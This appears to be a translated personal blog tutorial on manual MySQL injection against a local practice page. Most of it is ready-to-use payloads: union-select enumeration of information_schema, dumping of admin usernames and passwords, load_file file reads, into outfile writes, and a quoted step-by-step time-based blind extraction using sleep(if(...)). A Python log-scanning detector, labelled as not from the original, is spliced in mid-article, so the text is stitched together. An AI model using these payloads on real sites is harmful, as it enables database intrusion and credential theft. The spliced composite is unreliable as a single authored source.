MySQL Injection Chapter

Source: Internet
Author: User

This blog really tests my patience. Every time I write a note I agonise over getting started; everyone has a lazy side. This MySQL injection note has been dragged out until now before I begin summarising it, because the subject is too broad and too scattered, and even a thin summary is a headache to write.

Because I did not find a real PHP source to run locally, I had to rely on the source of a vulnerable practice platform. The steps cannot be demonstrated live, so only the statements are listed, with no screenshots of the actual operation. After all, without the source code there is nothing to run ...

First, as everyone knows, MySQL differs from Access in that one MySQL server holds multiple named databases.


This is the format of what I posted; forgive me that there is no local source, not even a database, so I cannot show the actual screenshots.

In MySQL injection we do not discuss other MySQL skills, only injection. Here the database can be divided into two groups: versions above 5.0 and versions at or below 5.0. From 5.0 on there is a virtual database, INFORMATION_SCHEMA, which catalogues the whole server: the tables and columns of database A, database B and so on can all be looked up there. Below 5.0 you can only guess the database name, table name and column name, just as with an Access database.

The following are the functions, tables and column names commonly used in penetration testing.

Database name: database()
Database version: version()
Database user: user()
Operating system: @@version_compile_os
System user name: system_user()
Current user name: current_user()
User name of the connecting session: session_user()
Database data directory: @@datadir
MySQL installation path: @@basedir
Read a local file: load_file() (the path may also be supplied as a hex or decimal literal)
Write a file: into outfile
Table storing all table names: information_schema.tables
Table name column: table_name
Database name column: table_schema
Column name column: column_name
Table storing all column names: information_schema.columns

Now I begin with the statements I construct. I will summarise these in detail, but this article does not cover injection bypass techniques, only the statements for extracting databases, tables and columns. MySQL injection can be divided into several methods: ordinary (union) injection, error-based injection, blind injection, and some unusual injection points. POST injection, cookie injection, string injection and search injection, which everyone knows about, I will record in a separate article, because those are tricky.

I will now record the injection method for MySQL 5.0 and above. Below 5.0, as I said before, there are no rules to follow; everything is guesswork, just like an Access database. First I need to determine whether the point is injectable and then find the number of fields; both steps are the same as Access injection: and 1=1, and 1=2, then order by to find the number of fields. The remaining steps, extracting the database name, table names, column names and data, are the focus.

http://127.0.0.1/mysql/sql.php?x=1

If this is an injection point and we know the number of fields is 3, then our statement is:

http://127.0.0.1/mysql/sql.php?x=1 union select 1,2,3

Then press Enter and see whether the numbers are displayed. This differs from Access: there is no need to append a table name, because we do not know the table name yet; below 5.0 we can only guess it, as in Access.

If the page displays, say, the number 3 out of these three fields, we know that position is echoed and can inject information there.

http://127.0.0.1/mysql/sql.php?x=1 union select database(),version(),user()

With these three functions replacing the three positions 1,2,3, we obtain the database name, database version and database user. Remember that this is the name of the current database and the current user.

If we know:

Current database name: sqlin

Database version: 5.5.40

Current database user: [email protected]

Of course we can swap in other functions, such as @@datadir to get the database path or @@version_compile_os to get the operating system. The operating system matters: on Windows, names are not case-sensitive, but on Linux they are case-sensitive and must not be wrong; remember this.

Next, construct the statement that gets the table names under the current database:

http://127.0.0.1/mysql/sql.php?x=1 union select group_concat(table_name),2,3 from information_schema.tables where table_schema=0x73716c696e20

This statement retrieves all table names under the current database. 0x73716c696e20 is the hex encoding of the database name collected in the first step (0x73716c696e spells sqlin; the trailing 0x20 is a space byte); you can convert it with the Small Kwai conversion tool. Of course, we can also extract the table names under the current database one at a time. Let me find my notebook, where I recorded it ... um, it is missing; I probably left it at school, so I went online to find a post.

http://127.0.0.1/mysql/sql.php?x=1 union select table_name,2,3 from information_schema.tables where table_schema=database() limit 0,1

This also retrieves the table names of the current database, but one at a time; you control which one with the numbers after limit, in the format limit 0,1, limit 1,1, limit 2,1 and so on.


But I still prefer to dump them all at once and then go through them looking for a table that may hold accounts, so I record only the all-at-once version.

If we pick the table named admin, we then start dumping its column names.

The following constructs the statement that extracts the column names under the current table name:

http://127.0.0.1/mysql/sql.php?x=1 union select group_concat(column_name),2,3 from information_schema.columns where table_name=0x61646d696e

This dumps all column names under the table; 0x61646d696e is the hex encoding of the table name admin that we just found.

At this point we have the column list. If we choose the two columns username and password, we start extracting the data, which is very simple:

http://127.0.0.1/mysql/sql.php?x=1 union select 1,username,password from admin

If that does not come out, there is another method: use group_concat to output all the information in the columns in one go.

http://127.0.0.1/mysql/sql.php?x=1 union select 1,group_concat(username,0x5c,password),3 from admin

This uses a single echoed position to output all the data (0x5c is a backslash, used as the separator).

That is the simplest routine test. I also listed the load_file() function above, which reads the contents of a file path; the path must be absolute, such as D:\mysql\123,txt. It can only read from such an absolute path.

This is an example:

http://127.0.0.1/mysql/sql.php?x=1 union select load_file('D:/mysql/123,txt'),2,3

This is a read; root privileges and normal privileges differ greatly. With root you can read everything; without root you can only read the files a normal user may read (load_file() additionally requires the FILE privilege and, on newer servers, is restricted by secure_file_priv). Speaking of root: the into outfile write function I mentioned earlier requires root privileges, and you need to know the absolute path.

This is an example:

http://127.0.0.1/mysql/sql.php?x=1 union select 'shiyan',2,3 into outfile 'd:/mysql/123,txt'

By the way, I do not know whether you noticed that in the address I used / rather than \; that is a small puzzle I will not elaborate on.


Is that everything? Wrong! I have not yet summarised the blind and error-based statements ... Let me start now.

First, the blind statements. The core of blind injection is relying on an if judgement. I spent half a day on a local notepad just wanting to raise one question: blind injection cannot be summed up in a few simple statements like the ones above, which, though summarised, are only common manual MySQL injection; there are many others ... Forget it, I will paste directly from a WooYun (乌云) article in which an expert summarised it, and even that is only a small part; there are many other constructions. His article is enough to understand blind injection, but generally this kind of test is run straight through the sqlmap tool. Manual injection survives only because of its flexibility: it can bypass all sorts of filters and try all sorts of tests, so it must be kept.

I will start with this expert's summary of MySQL manual blind injection. (If the author sees this and feels infringed, message me directly and I will delete it.)

-----------------------------------------------------------------------------------------------------------

MySQL Manual Blind Injection


[email protected]

The core of blind injection is injecting via the if judgement.

Review the if judgement and other functions before manual blind injection:

version() shows the database version
database() shows the current database name
user() shows the current user
length(str) returns the length of a string

mid(str,1,3) intercepts a substring: starting at byte 1, take 3 bytes.


Extra knowledge: ord() converts a character to its ASCII code (look the value up in an ASCII code table).


if syntax:

if(condition, value_if_true, value_if_false);

Start manual blind injection

select * from admin where user='admin' and sleep(2); execution takes 2 seconds

1. Get the database name length
database() shows the current database name


(select length(database())) queries the database name length


select * from admin where user='admin' and sleep(if((select length(database()))=2,5,0));
If the database name length equals 2 the condition is true, otherwise false;
here it is false, so it ends up as sleep(0).

If the database name length equals 7 the condition is true,
and it ends up as sleep(5),

i.e. select * from admin where user='admin' and sleep(5)

Now we know the database name length is 7; the next step is to get the database name.

2. Get the database name
The database name length is 7.
select * from admin where user='admin' and sleep(if((select mid(database(),1,1))='a',5,0));
Executes false, meaning the first byte is not a.

select * from admin where user='admin' and sleep(if((select mid(database(),1,1))='x',5,0));
Executes true, taking 5 seconds, meaning the first byte is x.

Then slowly work through all 7 bytes ...
select * from admin where user='admin' and sleep(if((select mid(database(),1,1))='x',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),2,1))='i',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),3,1))='n',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),4,1))='d',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),5,1))='o',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),6,1))='n',5,0));
select * from admin where user='admin' and sleep(if((select mid(database(),7,1))='g',5,0));
The first byte is x
The second byte is i
The third byte is n
The fourth byte is d
The fifth byte is o
The sixth byte is n
The seventh byte is g
All of them take 5 seconds, so the database name is xindong.

Of course, this method is relatively slow, and what if the database name contains special symbols? Guess the symbols one at a time?
Use the ord() function and ASCII codes to make it quick.

For example:

select * from admin where user='admin' and sleep(if(ord((select mid(database(),1,1)))>200,5,0));
Condition: greater than 200; executes false, meaning not greater
select * from admin where user='admin' and sleep(if(ord((select mid(database(),1,1)))>100,5,0));
Condition: greater than 100; executes true, meaning greater
select * from admin where user='admin' and sleep(if(ord((select mid(database(),1,1)))>120,5,0));
Condition: greater than 120; executes false, meaning not greater
select * from admin where user='admin' and sleep(if(ord((select mid(database(),1,1)))>110,5,0));
Condition: greater than 110; executes true, meaning greater

This shows the ASCII code of the first byte of the database name is greater than 110 and less than 120,
i.e. between 110 and 120.

select * from admin where user='admin' and sleep(if(ord((select mid(database(),1,1)))=120,5,0));

Equals 120 executes true, meaning the ASCII code of the first byte is 120.

Decoding it finally gives x.


3. Get the table name length

select * from admin where user='admin' and 1=2 union select 1,sleep(if(length(table_name)=5,5,0)) from information_schema.tables where table_schema=database() limit 0,1;

Length equals 5 executes true,
so the table name length is 5.


4. Get the table name

Get the 1st byte
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(table_name,1,1)='a',5,0)) from information_schema.tables where table_schema=database() limit 0,1;
The request takes 5 seconds, meaning it is a

Get the 2nd byte

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(table_name,2,1)='d',5,0)) from information_schema.tables where table_schema=database() limit 0,1;
The request takes 5 seconds, meaning it is d

Get the 3rd byte

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(table_name,3,1)='m',5,0)) from information_schema.tables where table_schema=database() limit 0,1;
The request takes 5 seconds, meaning it is m

Get the 4th byte

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(table_name,4,1)='i',5,0)) from information_schema.tables where table_schema=database() limit 0,1;
The request takes 5 seconds, meaning it is i

Get the 5th byte

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(table_name,5,1)='n',5,0)) from information_schema.tables where table_schema=database() limit 0,1;
The request takes 5 seconds, meaning it is n




5. Get the length of the first field of a table
The table name is admin; in hex: 61646d696e
select * from admin where user='admin' and 1=2 union select 1,sleep(if(length(column_name)=4,5,0)) from information_schema.columns where table_name=0x61646d696e limit 0,1;

The request takes 5 seconds, meaning the first field name has 4 bytes

6. Get the first field name of a table

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(column_name,1,1)='u',5,0)) from information_schema.columns where table_name=0x61646d696e limit 0,1;

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(column_name,2,1)='s',5,0)) from information_schema.columns where table_name=0x61646d696e limit 0,1;

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(column_name,3,1)='e',5,0)) from information_schema.columns where table_name=0x61646d696e limit 0,1;

select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(column_name,4,1)='r',5,0)) from information_schema.columns where table_name=0x61646d696e limit 0,1;

The first field obtained is user


Then the first field is probably the user name, and the password field follows it. As when getting the first field's length, use limit to get the next field's length, and then get the password field name.

7. Get database content
7.1 First guess the length of the data in the first field
select * from admin where user='admin' and 1=2 union select 1,sleep(if(length(user)=5,5,0)) from admin limit 0,1;
Executing for 5 seconds shows the data in this field is 5 bytes long

Then get the data:
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(user,1,1)='a',5,0)) from admin limit 0,1;
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(user,2,1)='d',5,0)) from admin limit 0,1;
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(user,3,1)='m',5,0)) from admin limit 0,1;
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(user,4,1)='i',5,0)) from admin limit 0,1;
select * from admin where user='admin' and 1=2 union select 1,sleep(if(mid(user,5,1)='n',5,0)) from admin limit 0,1;

So the user name is admin.
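As an added defender-side example, not code from the original post or from the quoted article, here is a small Python scanner that recognises the constructs this article's union-based and blind sections rely on (union select, information_schema lookups, group_concat, sleep(if(...)), load_file/into outfile) in web-server access-log lines, and decodes the 0x... hex literals back to the schema and table names they encode. The log format (combined-style lines) and all sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The first
# four mirror statements from the article; the last is a benign request.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /mysql/sql.php?x=1+union+select+database(),version(),user() HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /mysql/sql.php?x=1+union+select+group_concat(table_name),2,3+from+information_schema.tables+where+table_schema=0x73716c696e20 HTTP/1.1" 200 640
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /mysql/sql.php?x=1+union+select+1,group_concat(username,0x5c,password),3+from+admin HTTP/1.1" 200 700
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /mysql/sql.php?x=1+and+sleep(if((select+length(database()))=7,5,0)) HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:10 +0000] "GET /mysql/sql.php?x=2 HTTP/1.1" 200 512
"""

# One pattern per construct the article uses. They are applied to the
# URL-decoded, lower-cased request so spacing and case variants still match.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\.(tables|columns|schemata)\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "time_based_blind": re.compile(r"\bsleep\s*\(\s*if\s*\("),
    "file_access": re.compile(r"\b(load_file\s*\(|into\s+outfile\b)"),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b")
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_hex_literals(query):
    """Turn MySQL 0x... literals back into text, e.g. 0x61646d696e -> 'admin'."""
    decoded = []
    for digits in HEX_LITERAL.findall(query):
        try:
            decoded.append(bytes.fromhex(digits).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<binary:" + digits + ">")  # odd length or non-text
    return decoded


def analyse_line(line):
    """Return None for a clean request, else which signatures fired and any hex values."""
    match = REQUEST.search(line)
    if not match:
        return None
    query = unquote_plus(match.group(1)).lower()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if not hits:
        return None
    return {"url": match.group(1), "signatures": hits, "hex_values": decode_hex_literals(query)}


def scan_log(text):
    """Scan a whole log and return the flagged requests in order."""
    return [r for r in (analyse_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["signatures"], hit["hex_values"], hit["url"])
```

Decoding the literal from the second line yields "sqlin " with a trailing space, which is exactly the 0x20 byte in the article's own value; decoding rather than pattern-matching the hex is what tells a responder which schema or table the request was aimed at.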


Finally posted. These basically let you understand the principle and construction of manual blind injection; if you want to go deeper, search Baidu ... after all, this is only the surface.

Next come the other, error-based injections. I studied these for a long time, then after a new year I had forgotten them all .... There are many kinds of error-based injection; on this one I really can only collect other material, since what I hand-wrote myself I have nearly all forgotten ....

The following are hyperlinks; those who want to go deeper can find the material there.

10 MySQL error injection
What is the principle of echo injection based on MySQL errors?
MySQL error injection methods, organised
MySQL error injection principle analysis (count(), rand(), group by)
MySQL injection summary & MySQL critical error injection methods, organised
Classic MySQL "Duplicate entry" error injection

Well, that is about it. I have seen these, though I am still not very proficient; after all, they come up in CTF problems ....

In summary, without source code nothing could be demonstrated. Above I said I used an attack platform; later I thought I would also open a post recording my local attack platform, but I already feel I have no energy to record it. As said above, this article leaves out many techniques; it is a pure, simple record, because I want to put the summary of techniques into a separate post.

Every record is a review of my own knowledge, like people who teach: the more you talk, the less you forget. The more I write, the more I summarise; even if I forget, looking at my own records brings it back quickly.
